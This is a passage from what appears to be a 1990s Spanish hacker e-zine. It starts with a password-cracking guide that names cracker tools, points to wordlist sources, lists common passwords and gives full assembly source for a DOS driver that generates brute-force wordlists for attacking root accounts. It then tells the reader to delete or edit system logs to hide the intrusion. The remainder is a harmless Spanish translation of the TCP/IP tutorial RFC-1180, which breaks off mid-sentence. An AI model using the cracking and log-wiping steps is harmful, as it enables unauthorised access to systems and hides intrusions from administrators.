Cracker Jack 1008 586
KillerCracker 350 586

Estos programas se encuentran disponibles en cualquier pagina de Hackers, si
quieres la ultima version de StarCracker visita la siguiente URL:
http://www.geocities.com/SiliconValley/park/8403/index.html

Para conseguir listas de palabras haz FTP a el siguiente servidor:
warwick.ac.uk
directorio: /pub/cud

Algunas de las palabras mas usadas en contrase§as son:

aaa academia ada adrian
aerobics airplane albany albatros
albert alex alexander algebra
alias alisa alpha alphabet
ama amy analog anchor
andy andrea animal answer
anything arrow arthur ass
asshole athena atmosphere bacchus
badass bailey banana bandit
banks bass batman beautiful
beauty beaver daniel danny
dave deb debbie deborah
december desire desperate develop
diet digital discovery disney
dog drought duncan easy
eatme edges edwin egghead
eileen einstein elephant elizabeth
ellen emerald engine engineer
enterprise enzyme euclid evelyn
extension fairway felicia fender
finite format god hello
idiot jester john johnny
joseph joshua judith juggle
julia kathleen kermit kernel
knight lambda larry lazarus
lee leroy lewis light
lisa louis love lynne
mac macintosh mack maggot
martin marty marvin matt
master maurice maximum merlin
mets michael michelle mike
minimum nicki nicole rascal
really rebecca remote rick
reagan robot robotics rolex
ronald rose rosebud rosemary
roses ruben rules ruth
sal saxon scheme scott
secret sensor serenity sex
shark sharon shit shiva
shuttle simon simple singer
single singing smile smooch
smother snatch snoopy soap
socrates spit spring subway
success summer super support
surfer suzanne tangerine tape
target taylor telephone temptation
tiger tigger toggle tomato
toyota trivial unhappy unicorn
unknown urchin utility vicki
virginia warren water weenie
whatnot whitney will virgin
william winston willie wizard
wonbat yosemite zap whatnow

Obtuve algunas cuentas, ahora?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para poder hacer y deshacer en el servidor necesitas el password de la
cuenta root. Si despues de intentar con algunas listas de palabras no puedes
necesitaras hacer un ataque en bruto, es decir empezar desde la letra A
hasta la palabra zzzzzzzz
El siguiente programa necesita ser compilado usando TASM y es una lista de
palabras TSR que no ocupa espacio en disco y puede ser modificada, es ideal
para ataques brutos a la cuenta r00t (Programa Copiado de Phrack 47)

P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit
+++++++++++++++++++++++++++++++++++++++++++++

Que tan practico es?
--------------------
Este programa no necesita mucho espacio en disco y puede crear listas de
palabras de gran tama§o.

Con el ejemplo proporcionado, passwords empezando en 'aaaaaaa' y terminando en
'zzzzzzz' seran generados.

Como empiezo a usar esta lista de palabras?
-------------------------------------------

Compila el codigo y nombralo "hackdrv.sys", despues necesitas configurarlo
a§adiendo la siguiente linea en CONFIG.SYS

device=c:\hackdrv.sys

Una vez en memoria el programa creara la lista de variables en memoria llamada
HACKPWD. Cualquier programa que uses (excepto StarCracker) debera reconocer
hackpwd como una lista de palabras y empezar a crackear.
Si deseas reiniciar una sesion desde una combinacion especifica solo modifica
el archivo HACKDRV.SYS con un editor HEXADECIMAL y modifica la cadena de
caracteres con los que empieza ;-0

;-----------------------cut here--------------------------------
;Program HACKDRV.SYS
;
org 0h
next_dev dd -1
attribute dw 0c000h ;character device w/ ioctl calls
strategy dw dev_strategy
interrupt dw dev_int
dev_name db 'HACKPWD '
countr dw offset number
number db 'aaaaaa',0ah ;<---- 6 caracteres en minusculas (empiezo)
numsize equ $-number - 2
afternum:

;working space for device driver
rh_ofs dw ?
rh_seg dw ?

dev_strategy: ;strategy routine
mov cs:rh_seg,es
mov cs:rh_ofs,bx
retf

dev_int: ;interrupt routine
pushf
push ds
push es
push ax
push bx
push cx
push dx
push di
push si

cld
push cs
pop ds

mov bx,cs:rh_seg
mov es,bx
mov bx,cs:rh_ofs

mov al,es:[bx]+2
rol al,1
mov di,offset cmdtab
xor ah,ah
add di,ax
jmp word ptr[di]


cmdtab: ;command table
dw init ;0
dw exit3 ;1
dw exit3 ;2
dw ioctl_read ;3
dw do_read ;4
dw exit3 ;5
dw exit3 ;6
dw exit3 ;7
dw exit3 ;8
dw exit3 ;9
dw exit3 ;10
dw exit3 ;11
dw ioctl_write ;12
dw exit3 ;13
dw 5 dup (offset exit3)



ioctl_read:
push es
push bx

mov si,es:[bx+10h]
mov di,es:[bx+0eh]
mov es,si

push cs
pop ds
mov si,offset number
xor cx,cx

get_char:
lodsb
stosb
inc cl
cmp al,0ah
jz ioctl_rend
jmp get_char

ioctl_rend:
pop bx
pop es
mov es:[bx+012h],cx
mov cs:countr,offset number
jmp exit2

ioctl_write:
push es
push bx
mov si,es:[bx+010h]
mov ds,si
mov si,es:[bx+0eh]
mov cx,numsize+1 ;es:[bx+012h]
push cs
pop es
mov di,offset number
repe movsb
pop es
pop bx
mov cs:countr,offset number
jmp exit2


do_read:
push es
push bx


push cs
pop ds

mov si,[countr]
inc si ;word ptr [countr]
cmp si,offset afternum
jnz is_okay
mov si,offset number
call inc_num


is_okay:
mov [countr],si
mov di,es:[bx]+0eh
mov ax,es:[bx]+010h
mov cx, es:[bx]+012h
jcxz clean_up
mov es,ax
repe movsb

clean_up:
pop bx
pop es
jmp exit2


exit3: mov es:word ptr 3[bx],08103h
jmp exit1

exit2:
mov es:word ptr 3[bx],0100h

exit1:
pop si
pop di
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
popf
retf
exit:

inc_num proc near
push si
mov si,numsize

reiterate:
inc byte ptr [number+si]
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
jnz _exit
mov byte ptr [number+si],'a' ;starting char. in range
dec si
cmp si,-1
jnz reiterate
mov byte ptr [number],01ah ;send EOF
_exit:
pop si
ret
inc_num endp



at_eof: ; the non-resident code starts here

initial proc near
push es

push cs
pop ds

push cs
pop es

mov si,offset number
mov di,offset tmpnum
cld
_again:
lodsb
cmp al,0ah
jz _nomorechars
stosb
jmp _again

_nomorechars:
mov si,offset msgend
mov cx,4
repe movsb

mov ah,09 ;print welcome message
mov dx,offset msg1
int 21h

pop es
ret
initial endp

init: call initial
mov ax,offset at_eof
mov es:[bx]+0eh,ax
push cs
pop ax
mov es:[bx]+010h,ax
mov cs:word ptr cmdtab,offset exit3
jmp exit2


msg1 db "Incremental Password Generator (c)1995",0ah,0dh
db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
db "Starting at word ["
tmpnum db 10 dup (?)
msgend db "]",0a,0d,'$'
;END hackdrv.sys
----------------------------------cut here----------------------------------

Como limpiar tus huellas
~~~~~~~~~~~~~~~~~~~~~~~~
Si deseas que tu ingreso con la cuenta r00t no quede registrado en los LOGS
de el servidor revisa los directorios buscando archivos como logs, syslog,
log, o cualquiera que parezca que guarda un reporte de los accesos y
borralos o mejor aun editalos usando el editor de archivos de UNIX. Para
ejecutar el editor usa el comando vi

Edita o borra los siguientes archivos: /etc/syslog
/etc/log
/etc/logs

Existen algunos scripts para borrar las huellas como ZAP! disponibles en la
red y en los proximos numeros de esta revista.
Le PompaItor
^^^^^^^^^^^^
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=


La primera parte de este tremendo articulo *<><><><><><><><><><><><*
lo encontraras en RareGaZz #1 <> TCP/IP <>
<> Tecnologia Internet <>
@ Numero 2 de 2 @ *<><><><><><><><><><><><*



4.2 Escenario tipico de translacion

Durante una operacion normal en una aplicacion de red, como TELNET, se
envia un mensaje de aplicacion a TCP, despues TCP envia el correspondiente
mensaje TCP a el modulo IP. La direccion destino IP es conocida por la
aplicacion, el modulo TCP y el modulo IP. En este punto el paquete IP ha
sido construido y esta listo para ser entregado a el controlador Ethernet,
pero primero la direccion Ethernet debe ser determinada.

La tabla ARP es usada para ver la destinacion Ethernet.

4.3 ARP SOLICITUD/RESPUESTA

La tabla ARP es completada automaticamente segun se vaya necesitando.

Cuando una tabla ARP no puede ser usada para transladar una direccion
suceden estas dos cosas:

1. Una paquete de solicitud ARP con una direccion Broadcast Ethernet -es
decir, a todos los componentes de la red- es enviado a cada computadora.

2. El paquete IP es marcado para futuro envio.

Cada computadora en la interfaz Ethernet recibe el cuadro Ethernet por ser
enviado a la direccion 'anunciada' (broadcast). Cada manejador Ethernet
examina el tipo de campo en el cuadro Ethernet y pasa el paquete ARP a el
modulo ARP. El paquete de solicitud ARP dice "Si tu direccion IP es igual
a la direccion IP destino, entonces dime tu direccion Ethernet"
. Un paquete
de solicitud ARP es algo asi:

------------------------------------------------
|Direccion IP Destino 223.1.2.1 |
|Direccion Ethernet Remitente 08-00-39-00-2F-C3|
------------------------------------------------
|Direccion IP Destino 223.1.2.2 |
|Direccion Ethernet Destino <blank> |
------------------------------------------------
TABLA 2. Ejemplo de una solicitud ARP

Cada modulo ARP examina su direccion IP y si la direccion IP destino
coincide con su propia direccion IP, le envia una respuesta directamente
a la direccion Ethernet fuente. El paquete ARP respuesta dice "Si, esa es
mi direccion IP, dejame darte mi direccion Ethernet"
.Un paquete de respuesta
ARP tiene el campo remitente/destinatario al revez que la solicitud. El
paquete se ve algo asi:

------------------------------------------------
|Direccion IP Remitente 223.1.2.2 |
|Direccion Ethernet Remitente 08-00-28-00-38-A9|
------------------------------------------------
|Direccion IP Destino 223.1.2.1 |
|Direccion Ethernet Destino 08-00-39-00-2F-C3|
------------------------------------------------
TABLA 3. Respuesta ARP

La respuesta es recibida por la computadora que lo envio originalmente.
El controlador Ethernet se fija en campo en el cuadro Ethernet y luego pasa
el paquete ARP a el modulo ARP. El modulo ARP examina el paquete ARP y
a§ade la direccion IP remitente y destinatario a la tabla ARP.

La tabla quedaria asi:

-----------------------------------
|Direccion IP Direccion Ethernet|
-----------------------------------
|223.1.2.1 08-00-39-00-2F-C3|
|223.1.2.2 08-00-28-00-38-A9|
|223.1.2.3 08-00-5A-21-A7-22|
|223.1.2.4 08-00-10-99-AC-54|
-----------------------------------
TABLA 4. Tabla ARP despues de la respuesta

4.4 La Continuacion del Escenario

La nueva tanslacion ha sido instalada automaticamente en la tabla, solo
microsegundos despues de que se necesitaba. Como puedes recordar de el
paso 2 arriba, el paquete IP era marcado para futuro envio. Ahora, la
direccion IP era transladada a la direccion Ethernet simplemente observando
la tabla ARP y luego el cuadro Ethernet es transmitido a la Ethernet.
Asi, con los nuevos pasos 3, 4, y 5, el escenario para la computadora que
envia (remitente) es:

1. Un paquete de peticion ARP es enviado con una direccion anunciada y
es enviado a todas las computadoras de la red.

2. El paquete IP era marcado para futuro envio.

3. La respuesta ARP llega con la direccion IP-a-Ethernet para la tabla.

4. Para el paquete IP marcado para futuro envio, la tabla es usada para
transladar la direccion IP a Ethernet.

5. El cuadro Ethernet es transmitido a la Ethernet.

En breve, cuando la translacion hace falta en la tabla ARP, una paquete IP
es detenido y se espera a que responda una computadora a la solicitud
ARP. La informacion necesaria para la translacion es rapidamente completada
y el paquete IP es transmitido.

Cada computadora tiene una tabla ARP separada de cada interfaz Ethernet.
Si la computadora destino no existe, no habra ninguna respuesta ARP y la
tabla ARP no sera completada. IP descartara el paquete IP enviado a esa
direccion. Los protocolos de la parte alta de la Ethernet no pueden
diferencias entre una Ethernet rota y la falta de una computadora con la
direccion IP destino.

5. Protocolo Internet

El modulo IP es central en la tecnologia Internet y la escencia de IP es
su tabla ruteadora. IP usa su tabla en-memoria para hacer todas las
decisiones acerca de la ruta de un paquete IP. El contenido de la tabla
ruteadora es definido por el administrador de la red. Un error en esa
tabla bloquea la comunicacion.

Para entender como una tabla ruteadora es usada es necesario entender
el trabajo entre redes llamado internetworking. Este entendimiento es
necesario para la administracion y mantenimiento satisfactorio de una
red IP.

La tabla ruteadora es mejor entendida si primero se tiene una vista de
el ruteado, despues aprendiendo acerca de las direcciones IP de las
redes y por ultimo comprender los detalles.

5.1 Ruteado Directo

La figura de abajo es una internet peque§a con 3 computadoras: A, B, y C.
Cada computadora tiene la misma escalera de protocolos TCP/IP como se ve
en la figura 1.
Cada interfaz Ethernet tiene su propia direccion Ethernet. Cada computadora
tiene su direccion IP asignada a la interfaz por el administrador de la red,
quien tambien ha asignado un numero IP a la Ethernet.

A B C
| | |
--o------o------o--
Ethernet 1
Desarrollo de una red IP

Figura 6. Una red IP

Cuando A envia un paquete IP a B, el encabezado IP contiene la direccion
IP de la computadora A y el encabezado contiene la direccion Ethernet de
A como la direccion Ethernet fuente. Tambien, el encabezado IP contiene
la direccion IP de B como la direccion destino y el encabezado Ethernet
contiene la direccion Ethernet de B como la direccion destino.

------------------------------------------
| Direccion Fuente Destino |
------------------------------------------
| Encabezado IP A B |
| Encabezado Ethernet A B |
------------------------------------------
TABLA 5. Direcciones en un cuadro Ethernet para un paquete IP
de A dirigido a B

Para este simple caso, IP esta en el punto mas alto por que IP a§ade poco
servicio ofrecido por la Ethernet. De cualquier manera. IP a§ade costo: El
tiempo extra de procesamiento del CPU y el ancho de banda a generar,
transmitir y crear el encabezado IP.

Cuando el modulo IP de la computadora B recibe el paquete de A, checa la
direccion IP destino con su propia direccion buscando que sean iguales,
despues pasa el datagrama los protocolos de mas alto nivel.

Esta comunicacion entre A y B usar ruteado directo.

5.2 Ruteado Indirecto

La figura de abajo es una vista mas realistica de una Internet. Esta
compuesta de 3 Ethernets y 3 direcciones IP conectadas por un ruteador
IP llamado computadora D. Cada una de las 3 redes tiene 4 computadoras;
cada computadora tiene su propia direccion Ethernet e IP.

A B C ----D---- E F G
| | | | | | | | |
--o------o------o------o- | -o------o------o------o--
Ethernet 1 | Ethernet 2
"Desarollo" de la red IP | red IP "Contabilidad"
|
|
| H I J
| | | |
--o-----o------o------o--
Ethernet 3
red IP "Fabrica"

Figura 7. Tres redes IP; una Internet.

Con excepcion de la computadora D, cada computadora tiene la 'escalera' de
protocolos igual que en la figura 1. La computadora D es el ruteador IP
y esta conectada a las 3 redes y por eso tiene 3 direcciones IP y 3
direcciones Ethernet. La computadora D tiene la 'escalera' de protocolos
similar a la figura 3, excepto que tiene 3 modulos ARP y 3 controladores
Ethernet en lugar de 2. Por favor noten que la computadora D solo tiene
un modulo IP.

El administrador de la red ha asignado un numero unico llamado 'numero IP
de red' para cada una de las Ethernets. Los numeros IP de red no son
mostrados en este diagrama, solo los nombres de red.

Cuando la computadora A envia un paquete IP a la computadora B, el proceso
es identico a el ejemplo de la red sencilla. Cualquier comunicacion entre
las computadoras localizadas en una red IP sencilla es identica a el
ejemplo de ruteado discutido previamente.

Cuando las computadoras D y A se comunican, se llama comunicacion directa.
Cuando las computadoras D y E se comunican, se llama comunicacion directa.
Cuando las computadoras D y H se comunican, se llama comunicacion directa.
Esto es por que cada uno de estos pares de computadoras estan en la misma
red IP.

De cualquier manera, cuando la computadora A se comunica con una computadora
del otro lado del ruteador IP, la comunicacion no es directa. La computadora
A debe usar D para enviar el paquete IP a la siguiente red. Esta
comunicacion se llama "indirecta".

Este ruteado de paquetes IP es hecho por los modulos IP y transcurre
transparentemente a TCP, UDP, y a las aplicaciones de red.

Si A envia un paquete IP a E, la direccion remitente IP y la direccion
remitente Ethernet son las de A. La direccion IP destino es E, pero por que
el modulo IP de A envia el paquete a D para que lo diriga, la direccion
Ethernet destino es la de D.

------------------------------------
|Direccion Remitente Destino |
------------------------------------
|IP header A E |
|Ethernet header A D |
------------------------------------
TABLA 6. Direcciones en un cuadro Ethernet de un paquete IP de A
a E (pasando por D)

El modulo IP de D recibe el paquete despues de examinar la direccion IP
destino y dice "Esta no es mi direccion IP," y envia el paquete IP
directamente a E.

--------------------------------------
|Direccion Remitente Destino |
--------------------------------------
|Encabezado IP A E |
|Encabezado Ethernet D E |
--------------------------------------
TABLA 7. Direcciones en un cuadro Ethernet para un paquete IP
de A a E (despues de D)

En sumario, para comunicacion directa, ambas direcciones remitente IP y
la direccion remitente Ethernet es la direccion de la computadora que
envia y la direccion IP destino es la de el recipiente. Para comunicacion
indirecta, la direccion IP y la direccion Ethernet no coinciden en esta
manera.

Este ejemplo de internet es muy simple.Las verdaderas redes son regularmente
complicadas por muchos factores, resultando en multiples ruteadores IP y
distintos tipos de redes fisicas. Este ejemplo de internet puede realizarse
en el caso de que el administrador de la red quisiera dividir el trafico de
la red en orden de localizar el trafico Ethernet.

5.3 Reglas para el ruteador

[Este parte ha sido suprimida por el traductor!]

5.4 Direcciones IP

El administrador de la red asigna una direccion IP a las computadoras
de acuerdo con la red IP a las que la computadora este conectada. Una parte
de la direccion de 4 bytes es la direccion IP de red, la otra parte es el
numero IP de la computadora (o numero de host). Para la computadora en la
tabla 1, con una direccion IP de 223.1.2.1, el numero de red es 223.1.2 y
el numero Host es numero 1.

La porcion de las direcciones que es usado para el numero de red y para
el numero de Host es definido por los primeros bits en la direccion de
4 bytes. Todos los ejemplos de direcciones IP en este tutorial son de
clase C, significa que los 3 primeros bits indican que 21 bits son el
numero de la red y los 8 bits son el numero Host. Esto permite 2,097,152
redes clase C con mas de 254 Host en cada red.

El espacio de la direccion IP es administrado por el NIC -Network
Information Center-. Todas las Internets que esten conectadas a la unica
Internet Mundial deben usar numeros asignados por NIC. Si tu estas
preparando tu propia Internet y no tienes planeado conectarla a la Internet
mundial, de todas maneras debes obtener el numero de tu red por via NIC.
Si tu escoges tu propio numero, corres el riesgo de confusion y caos en
el momento que se conecte a la Internet Mundial.

5.5 Nombres

La gente se refiere a las computadoras por nombres no por numeros. Una
computadora llamada Alpha puede tener la direccion IP de 223.1.2.1. Para
redes peque§as, esta translacion de nombre a direccion es tenida en cada
computadora de el archivo "hosts". Para redes mas grandes, esta translacion
esta guardada en un servidor accesado desde la red cuando se necesite. Unas
pocas lineas de este archivo se verian asi:

223.1.2.1 alpha
223.1.2.2 beta
223.1.2.3 gamma
223.1.2.4 delta
223.1.3.2 epsilon
223.1.4.2 iota

La direccion IP es la primera columna y el nombre de la computadora es la
segunda columna.

  
En la mayoria de los casos, tu puedes instalar archivos "hosts" identicos
en todas las computadoras. Tu puedes darte cuenta que "Delta" tiene solo
una entrada en este archivo a pesar de tener 3 direcciones IP. Delta
puede ser alcanzada con cualquier de sus direccion IP; sin importar cual
sea usada. Cuando delta recibe un paquete IP revisa la direccion destino,
y reconocera cualesquiera de sus 3 direcciones IP.

Las redes IP tambien tienen nombres. Si tu tienes 3 redes IP, tu archivo
"networks" que documenta estos nombres se veria algo asi:

223.1.2 desarrollo
223.1.3 contadora
223.1.4 fabrica

El numero IP de la red esta en la primera columna y su nombre en la segunda.

Desde este ejemplo tu puedes ver que alpha es la computadora 1 en el
desarrollo de la red, beta es la computadora numero 2 en el desarrollo
de la red y asi. Tu tambien puedes decir que alpha es desarrollo.1,
Beta es desarrollo.2, y asi.

La lista de archivo HOST mostrada es adecuada para los usuarios, pero el
administrador de la red probablemente reemplzara la linea para delta con:

223.1.2.4 devnetrouter delta
223.1.3.1 facnetrouter
223.1.4.1 accnetrouter

Estas nuevas 3 lineas para el archivo hosts le dan a cada una de las
direcciones IP de delta un nombre con significado.

5.6 Tabla ruteadora IP

Cuando IP necesita saber que interfaz de red usar para mandar un paquete
IP se fija en la tabla ruteadora usando una llave de busqueda extraida
de la direccion IP destino.

La tabla de rutas o ruteadora contiene una columna para cada ruta. Las
columnas primarias en la tabla son: numero IP de red, bandera
directo/indirecto, direccion IP ruteadora y el numero de interfaz. Esta
tabla es usada por cada paquete IP que sale de la red.

En la mayoria de las computadoras la tabla ruteadora puede ser modificada
con la el comando "route". El contenido de la tabla de rutas es definido
por el administrador de la red por que el asigna las direccion IP a las
computadoras.

5.7 Detalles del ruteado indirecto

--------- ---------
| alpha | | beta |
| 1 | | 1 |
--------- ---------
| |
--------o---------------o-
Ethernet 1
Red IP "Desarrollo"

Figura 8. Vista cercana de una red IP

La tabla de rutas se ve asi:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
| Desarrollo directo <blank> 1 |
----------------------------------------------------------------
TABLA 8. Ejemplo de una simple tabla ruteadora

Esta vista puede ser observada en algunos sistemas UNIX con el comando
"netstat -r". Con esta simple red, todas las computadoras tienen tablas
ruteadoras identicas.

Para la discusion, la tabla es otra vez impresa con el nombre de red
transladado a su numero de red.
----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
|223.1.2 direct <blank> 1 |
----------------------------------------------------------------
TABLA 9. Ejemplo simple de una tabla ruteadora con numeros.

5.8 Escenario Directo

Alpha le esta enviando un paquete IP a beta. El paquete IP estan en el
modulo IP de beta y la direccion destino es beta o 223.1.2.2. IP extrae
la porcion de la red de la direccion IP y busca la primera columna buscando
que sean iguales. Con esta red el primer dato es encontrado y a§adido en
la primera entrada.

La otra informacion en esta entrada indica que computadoras en esta red
pueden ser alcanzadas directamente a travez de la interfaz 1. Una tabla
de translacion ARP termina en la direccion beta IP y luego el cuadro
Ethernet es mandado directamente a beta via interfaz numero 1.

Si una aplicacion trata de mandar datos a una direccion IP que no esta
en el desarrollo de la red, IP no podra encontrar en la tabla de rutas
la direccion IP y el paquete es descartado. Algunas computadoras proveen
con un mensaje de error.

5.9 Detalles del Ruteado Indirecto

Ahora examinaremos mas de cerca a los complicados mecanismo de ruteo
que son usados para el escenario examinado previamente.

--------- --------- ---------
| alpha | | delta | |epsilon|
| 1 | |1 2 3| | 1 |
--------- --------- ---------
| | | | |
--------o---------------o- | -o----------------o--------
Ethernet 1 | Ethernet 2
Red IP "Desarrollo" | Red IP "Contabilidad"
|
| --------
| | iota |
| | 1 |
| --------
| |
--o--------o--------
Ethernet 3
Red IP "Fabrica"

Figura 9. Vista de cerca de las 3 redes IP

La tabla ruteadora dentro de alpha se ve asi:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
| Desarrollo Directo <blank> 1 |
| Contabilidad Indirecto devnetrouter 1 |
| Fabrica Indirecto devnetrouter 1 |
----------------------------------------------------------------
TABLA 10. Tabla de rutas de alpha


La tabla de rutas se ve asi con numeros en lugar de nombres:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
|223.1.2 directo <blank> 1 |
|223.1.3 indirecto 223.1.2.4 1 |
|223.1.4 indirecto 223.1.2.4 1 |
----------------------------------------------------------------
TABLA 11. Tabla de rutas de alpha con numeros

El ruteador en la tabla de rutas de alpha es la direccion IP de la conexion
de Delta con la red desarrollo.

5.10 Escenario Indirecto

Alpha envia un paquete IP a epsilon. El paquete IP esta en el modulo IP y
la direccion destino IP es epsilon (223.1.3.2). IP extrae la porcion de la
red de la direccion IP (223.1.3) y busca la primera columna de la tabla
buscando una direccion igual. Una direccion es encontrada igual en la
segunda entrada (ver cuadro).

Esta entrada indica que las computadoras en la red 223.1.3 pueden ser
alcanzadas mediante el ruteador-IP devnetrouter. El modulo IP entonces
envia una tabla de translacion ARP a la direccion IP de devnetrouter y
envia el paquete IP directamente a devnetrouter a travez de la interfaz
alpha numero 1. El paquete IP sigue conteniendo la direccion IP destino
de epsilon.

El paquete IP llega a la interfaz desarrollo de la red delta y es pasado
a el modulo IP de delta. La direccion IP destino es examinada y por que
no es igual a ninguna de las direcciones propias de delta, decide pasar
el paquete IP.

El modulo IP de delta extrae la porcion de la red de la direccion destino
IP (223.1.3) y busca en su tabla de rutas por una red que sean iguales.
La tabla de rutas de delta se veria asi:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
| Desarrollo directo <blank> 1 |
| Fabrica directo <blank> 3 |
| Contabilidad directo <blank> 2 |
----------------------------------------------------------------
TABLA 12. Tabla de rutas de Delta

Abajo esta la tabla de rutas de delta de nuevo, en numeros.
----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
|223.1.2 directo <blank> 1 |
|223.1.3 directo <blank> 3 |
|223.1.4 directo <blank> 2 |
----------------------------------------------------------------
TABLA 13. Tabla de rutas de Delta con numeros

En la segunda entrada se encuentra la direccion IP buscada. IP envia el
paquete IP a epsilon a travez de la interfaz numero 3. El paquete IP
contiene la direccion destino de epsilon y la direccion destino Ethernet
del epsilon.

El paquete IP llega a epsilon y es pasado hacia la el modulo IP de epsilon.
La direccion IP destino es examinada y se encuentra la direccion destino,
asi que el paquete es pasado a los protocolos de la parte alta.

5.11 Sumario de Ruteo

Cuando un paquete IP viaja a travez de una larga internet tal vez pasara
por varios ruteadores-IP antes de llegar a el destino. El camino que toma
para llegar no esta determinado por una central fuente pero es el resultado
de consultar cada una de las tablas de ruteo usadas en el camino. Cada
computadora define solo el proximo brinco en el camino y se basa en esa
computadora para enviar el paquete IP a su destino.

5.12 Administrando las rutas

Mantener el correcto funcionamiento de las tablas ruteadoras en una gran
Internet es un trabajo complicado; la configuracion de una red esta siendo
modificada constantemente por los administradores de la red por distintas
razones. Errores en las tablas de ruteo bloquean la comunicacion en formas
que son tediosas de diagnosticar.

Cuando una computadora es movida de una red IP a otra, su direccion IP debe
ser cambiada. Cuando una computadora es removida de una red IP su vieja
direccion se vuelve invalida. Estos cambios requieren modificaciones
frecuentes a el archivo "HOSTS".

6. USER DATAGRAM PROTOCOL (UDP)

UDP es uno de los principales protocolos que residen en la cima de IP.
Ofrece servicio a las aplicaciones de red. Algunas aplicaciones de red
que usen UDP son: Network File System (NFS) y Simple Network Management
Protocol (SNMP). Este servicio es poco mas que una interfaz a IP.

UDP es un servicio sin conexion de entrega de datagramas que no garantiza
su llegada. UDP no mantiene una conexion de un extremo al otro con el modulo
UDP destino; solamente empuja el datagrama fuera de la red y acepta los
datagramas que llegan fuera de la red.

UDP a§ade dos valores a lo que es dado por IP. Uno es la capacidad de
multiplexing (varias salidas para una entrada) de la informacion entre las
aplicaciones basadas en el numero de puerto. La otra es un chequeo para
ver la integridad de los datos.

6.1 Puertos

Como una computador cliente alcanza el servidor en otra computadora?

El camino en la comunicacion entre una aplicacion y UDP es a travez de
puertos UDP. Estos puertos estan numerados empezando de cero. Una
aplicacion que ofrezca un servicio (el servidor) espera por los mensajes
que llegen por un puerto especifico dedicado a ese servicio. El servidor
espera pacientemente por cualquier cliente que pida servicio.

Cuando una aplicacion envia datos a travez de UDP, llega al final como
una unidad simple. Por ejemplo, si una aplicacion hace 5 escrituras a el
puerto UDP, la aplicacion destino hara 5 lecturas de el puerto UDP. Ademas,
el tama§o de cada escritura es igual a el tama§o de cada leida.

UDP mantiene la barrera de el mensaje definida por la aplicacion. Nunca une
dos mensajes de aplicacion juntos, o divide una simple aplicacion en partes.

6.2 Checksum

El checksum es la capacidad de comprobar si los datos recibidos estan en
las condiciones que los datos enviados.

Un paquete IP con un encabezado IP indicando "UDP" es pasado a el modulo
UDP por IP. Cuando el modulo UDP recibe el datagrama UDP de IP examina
el Checksum UDP. Si el checksum es cero, significa que el checksum no fue
calculado por el remitente y puede ser ignorado. Esto significa, que el
modulo UDP de la computadora que envia puede o no crear checksums.

Si el checksum es valido (o cero), el puerto destino es examinado y si una
aplicacion esta esperando en ese puerto, una mensaje de aplicacion es
enviado a la aplicacion. De otra forma el datagrama UDP es descartado.

7. Protocolo del Control de Transmision

TCP ofrece un servicio diferente a UDP. TCP ofrece una conexion orientada
por una corriente de bytes, en lugar de un datagrama sin conexion. TCP
garantiza la entrega, UDP no.

TCP es usado en las aplicaciones de red que requieren la entrega
garantizada y no puede ser aburrida haciendo retransmisiones o esperas.
Las aplicaciones tipicas que mas usan TCP son File Transfer Protocol (FTP)
y TELNET. La gran reliabilidad de TCP tiene un costo, requiere mas trabajo
del CPU y ancho de banda. El funcionamiento interno de TCP es mas complicado
que esos en un modulo UDP.

Similar a UDP, las aplicaciones de red se conectan a puertos TCP.Los puertos
bien definidos estan dedicados a aplicaciones especificas. Por ejemplo, el
servidor TELNET usa el puerto 23. El cliente TELNET puede encontrar el
servidor simplemente conectandose a el puerto 23 de TCP en una computadora
especifica.

Cuando una aplicacion empieza usando TCP, el modulo TCP en la computadora
cliente y el modulo TCP en el servidor empiezan la comunicacion entre
ellas.

Como todos los protocolos de ventanas, el protocolo tiene un tama§o de
ventana. El tama§o de la ventana determina la cantidad de datos que
pueden ser transmitidos antes de que se reciba la se§al de que han sido
recibidos. Para TCP, esta cantidad no se mide en segmentos TCP sino en
bytes.


Que aplicaciones de red estan disponibles?

Existen demasiadas aplicaciones de red como para listarlas. El numero esta
creciendo continuamente. Algunas aplicaciones han existido desde el
principio de la tecnologia internet como FTP y TELNET. Otras son
relativamente nuevas como X-Windows y SNMP. La siguiente lista menciona
una breve descripcion de las aplicaciones mencionadas en este tutorial.

8.1 TELNET

Telnet ofrece la capacidad de entrar (login) a un sistema remoto en TCP.
La operacion y apariencia es similar a un teclado marcando a travez de un
switch telefonico. En la linea de comandos en usuario escribe "telnet delta"
y recibe un login prompt de la computadora llamada "delta".

8.2 FTP

File Transfer Protocol (FTP), tan viejo como TELNET, tambien usa TCP y ha
tenido bastante popularidad. FTP permite copiar archivos entre computadoras.

8.5 SNMP

Simple Network Management Protocol (SNMP) usa UDP y esta dise§ado para
ser usado por las estaciones centrales de mantenimiento. Es un factor
conocido que si se le ofrece suficiente informacion, un manager de red
puede detectar y diagnosticar problemas en la red. La estacion central
usa SNMP para recibir la informacion de otras computadoras en la red.
SNMP define el formato de los datos; es dejado a la estacion central
o manager de la red el interpretar los datos.

8.6 X-Window

El sistema X Window usa el protocolo X Window en TCP para dibujar ventanas
en una estacion de trabajo usando BITMAP. X Window es mucho mas que una
simple utilidad para dibujar ventanas; es una filosofia entera para dise§ar
una interfaz de usuario.

9.0 Direcciones de los Autores

Theodore John Socolofsky
EMail: TEDS@SPIDER.CO.UK

Claudia Jeanne Kale
EMail: CLAUDIAK@SPIDER.CO.UK

Nota: Esta informacion fue tomada de RFC-1180.

[Editor: Espero la informacion proporcionada en este largo articulo haga
